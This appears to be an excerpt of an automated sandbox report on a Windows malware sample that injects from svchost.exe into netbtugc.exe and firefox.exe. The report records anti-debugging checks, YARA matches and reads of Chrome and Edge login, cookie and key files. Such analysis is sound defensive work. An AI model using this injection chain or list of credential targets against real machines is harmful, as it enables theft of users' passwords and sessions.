Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F7096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FC892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FBC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F68EF5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE6ED0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00730B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00702622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006F083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006F09D5 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006F0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtTerminateThread: Direct from: 0x77382FCC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | NtProtectVirtualMemory: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 3536
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2231008
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00731201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00712BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0073B226 SendInput,keybd_event
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_007522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QLLafoDdqv.exe"
Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00730B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00731663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: QLLafoDdqv.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: WOaBXdWwIJKzuV.exe, 00000003.00000000.2196131693.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4571525202.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4574449096.0000000001800000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
Source: QLLafoDdqv.exe, WOaBXdWwIJKzuV.exe, 00000003.00000000.2196131693.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4571525202.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4574449096.0000000001800000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: WOaBXdWwIJKzuV.exe, 00000003.00000000.2196131693.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4571525202.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4574449096.0000000001800000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: WOaBXdWwIJKzuV.exe, 00000003.00000000.2196131693.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4571525202.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4574449096.0000000001800000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006F0698 cpuid
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00748195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0072D27A GetUserNameW
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0070B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: QLLafoDdqv.exe | Binary or memory string: WIN_81
Source: QLLafoDdqv.exe | Binary or memory string: WIN_XP
Source: QLLafoDdqv.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 